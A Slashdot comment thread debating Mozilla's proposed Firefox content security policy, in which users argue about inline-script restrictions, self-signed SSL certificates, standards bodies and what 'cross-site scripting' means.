More than a "Firefox standard", it seems to me that this is an extension. I'm all for it, but let's call things by their name.

Yea. they are free. right. (1)

unity100 (970058) | more than 4 years ago | (#28521155)

just like they have forced the 'humongous, scary ssl warning error' instead of the previous acceptable and understandable error message. it forced a lot of small businesses who used the certificates they themselves signed to buy 3rd party certificates from vendors. again with this change, all small businesses will have to spend more on web development charges, because most end users will set their firefox to the prevent setting for this new feature. the 'free to do business is usual' bit is bullshit. remember, say the word 'security', and you can even sell wars to people. so dont feed the 'free to do business as usual' bullshit to anyone.

one thing that is most damaging to us open source crowd is being too self righteous and jacobin. it starts to hurt us again as time passes and projects develops. this time its happening with firefox.

Re:Yea. they are free. right. (1)

netsharc (195805) | more than 4 years ago | (#28521317)

Your last paragraph reminds me, hey Firefox is open source, let's just fork it!

Re:Yea. they are free. right. (1)

maxume (22995) | more than 4 years ago | (#28521335)

It will default to off. Defaulting to on would mean that offsite images would no longer load (nor would any content that is pulled from a CDN).

Re:Yea. they are free. right. (1)

ZorinLynx (31751) | more than 4 years ago | (#28521735)

Anyone doing business should have a legitimate SSL certificate for the site and not use a self-signed certificate. Anyone using a website should be wary of any business site using a self-signed certificate.

Self-signed certificates are okay for personal servers where you know you or a friend signed the cert, but if you're doing business it is a VERY BAD IDEA to use or trust self-signed certs. Firefox's behavior is correct in this regard.

Re:Yea. they are free. right. (1)

Jubilex (28229) | more than 4 years ago | (#28522135)

Speaking as an admin, I've seen way too many end users click through certificate warnings for self-signed certs without understanding what they are doing. Firefox is doing the right thing (and now that IE 8 is doing something similar, I'd say they aren't the only ones who think so.)

Re:Yea. they are free. right. (0)

Anonymous Coward | more than 4 years ago | (#28523885)

Sigh. With a self-signed certificate, there is no guarentee that you have an encrypted session. Hint:

Client Malicious Proxy Server Webserver

Nothing stops the Proxy from terminating the SSL connection, logging the (now decrypted) traffic, and then starting a new encrypted connection to the Webserver.

But if the certificate has to be signed, the Malicious Proxy cannot terminate an encrypted connection pretending to be from the Webserver, as it will not have a certificate that can be used to impersonate the webserver.

RFC? (3, Insightful)

Midnight Thunder (17205) | more than 4 years ago | (#28521179)

Is this 'standard' endorsed by anyone else or written up as part of an RFC? Calling something a standard when you are the only guys doing sounds like a certain company that was started by Bill and Paul.

I am not trying to troll here, since I am all for the solution, I am just ensuring that this properly documented and shared by the right entities (think W3C).

Re:RFC? (2, Informative)

Midnight Thunder (17205) | more than 4 years ago | (#28521285)

I should have the read the article first, since no where in the article do they mention the word 'standard'. When they do decide to make it happen I do hope the submit the proposal to the right organisations, as to avoid making this a one browser standard.

Re:RFC? (1)

blair1q (305137) | more than 4 years ago | (#28522393)

Bill and Paul made about $100 billion and their bugs have become the standard that most "standards" can't dislodge.

Anyone can proclaim a "standard", recall what "RFC" stands for? It's not "peer-reviewed and passed by governing bodies."

If Mozilla is saying this is how they're building it into the code base, W3C can ignore it, but it's W3C who won't be compatible with what is standard.

Break Bookmarklets? (1)

zmnatz (1502127) | more than 4 years ago | (#28521247)

Just wondering, wouldn't this break a lot of bookmarklets since they are essentially javascript being run from a different location on the site. Correct me if I'm wrong (I probably am). Just wondering

Massive Overkill (2, Informative)

butlerm (3112) | more than 4 years ago | (#28521259)

This proposal looks like massive overkill to me. Implementing the restriction on inline script tags is equivalent to saying - our web developers are incompetent and naive and cannot be trusted to take basic security measures, so we feel making our web development practices more cumbersome and inefficient (if not impossible) is a healthy trade off.

A more effective program would be to develop and promote standardized html sanitization routines for popular web development languages, so that user entered html could easily be accepted under certain restrictions. Most web logs do this already.

Alternatively a less draconian solution would be to allow inline scripts to execute if the script tag includes a response specific serialization value that is also present in the HTTP headers. 64 bit values would make forging a inline script essentially impossible, because there would only be a 1/2^64 probability of a subsequent accidental match.

Re:Massive Overkill (1)

v(*_*)vvvv (233078) | more than 4 years ago | (#28523655)

our web developers are incompetent and naive and cannot be trusted to take basic security measures so we feel making our web development practices more cumbersome and inefficient (if not impossible) is a healthy trade off.

The real question is, can YOU trust your web developers? And is this really that more cumbersome and inefficient than every other measure? It's just another tag. In fact, it is *just* a tag. It is also in the source of the problem - the web browser. You could argue everything else is a workaround, and finally we are getting help from the people responsible for inventing the problem.

A more effective program would be to develop and promote standardized html sanitization routines for popular web development languages

Yes, except, this is not easy, it is already being done, and it isn't quite working.

If one tag could eliminate the risk of external scripts running on my pages, I am all for it. Of course, this only works with firefox, so it is actually quite meaningless. Hackers can just fire up a different browser, so the number of hackers this will stop are exactly ZERO.

How do you code without any inline scripting? (1, Informative)

Anonymous Coward | more than 4 years ago | (#28522319)

How would you pass parameters to scripts? How would you do AJAX or DHTML stuff based on realtime data? I suppose you could wrap everything in semantic classes and data attributes containing JSON, hell even Javascript, and then include an external script that evals them all. Inline scripting through the backdoor. Is that what they want us to do? Or have an extra Javascript file with every HTML file?

Umm... (0)

Anonymous Coward | more than 4 years ago | (#28522851)

Why would anyone run cross site scripts *now*, except in clearly white-hat uses?

PLEASE GOD NOOO! ;) (1, Informative)

Hurricane78 (562437) | more than 4 years ago | (#28522935)

Please don't let this become the same horrors, that it is with plugins.

If you ever tried to add a applet or anything embedded into a site, that came from some other domain (like a mp3 stream), you will know what I am talking about.
It just gets blocked, except if you have a signed certificate and other shit, that you can only get for money. And then it is still a huge mess to set up.

In my eyes this stifled web technology quite a bit.

Additionally, what do you do, when you yourself have several domains and subdomains? Like a global domain for common things, like the base stylesheet and script libs, and a local domains, that use them. Etc.

It's good to make this safe. But it absolutely must be done right. Or else, there will be a giant mess. :/

XSS (Cross-Site Scripting) definition? (1)

jc42 (318812) | more than 4 years ago | (#28523735)

So is there an official definition of "Cross-Site Scripting" somewhere? Since that phrase started to be used in scary security stories a few years ago, I've been collecting the definitions that various stories provide, and I've been a bit disappointed. Mostly, they aren't even "definitions", in the usual dictionary sense of the term. I.e., I can't use most of the purported "definitions" to decide whether what I'm looking at is an instance of the phrase. And in general, no two stories or sites seem to use similar definitions (when they actually give definitions at all).

My impression is that "Cross-Site Scripting" is an empty scare phrase that really just means "anything involving two different machines and a script -- whatever that may be".

So has some official organization defined the phrase? If so, what makes them an authority? And is there some way that I can tell when someone is using the official definition (if such exists), or should I just continue to view the phrase as an attempt to scare readers without actually informing them about the problem?

I note that the definition associated with TFA isn't actually a definition. And several other postings here have linked to sites that also give ambiguous non-definition definitions.

It sure seems there's something being talked about here, but it seems to suffer from the usual problem with security authorities, that they view me as an idiot who doesn't need to be informed about the subject matter; I only need to be scared (presumably so that I'll pay them to fix something that they've carefully made sure I can't understand clearly).

I'd think that security is an area where you'd want to be careful with your definitions and terminology. But apparently I'm wrong.

But I want and need X-site scripting! (1)

kanweg (771128) | more than 4 years ago | (#28523797)

I'm a bit out of my league knowledge-wise here, but in my company I have a company web application that would benefit very much from being able to do something in the window of another site. Why can't a browser (not the web app) be set to very specifically allow a particular web application to make use of another specified website. E.g. that would allow me to fill out a form with data from the web app or vice versa to get data into my MySQL database without having to fill out the data manually, which is error-prone. Because it is a browser setting where both domains are set to specifically interact with each other, I don't see how it could be used to do anything malicious, but it would help web apps enormously.

Bert

Load More Comments
Slashdot Account

Need an Account?

Forgot your password?

Don't worry, we never post anything without your permission.

Submission Text Formatting Tips

We support a small subset of HTML, namely these tags:

  • b
  • i
  • p
  • br
  • a
  • ol
  • ul
  • li
  • dl
  • dt
  • dd
  • em
  • strong
  • tt
  • blockquote
  • div
  • quote
  • ecode

"ecode" can be used for code snippets, for example:

<ecode>    while(1) { do_something(); } </ecode>
Sign up for Slashdot Newsletters
Create a Slashdot Account

Loading...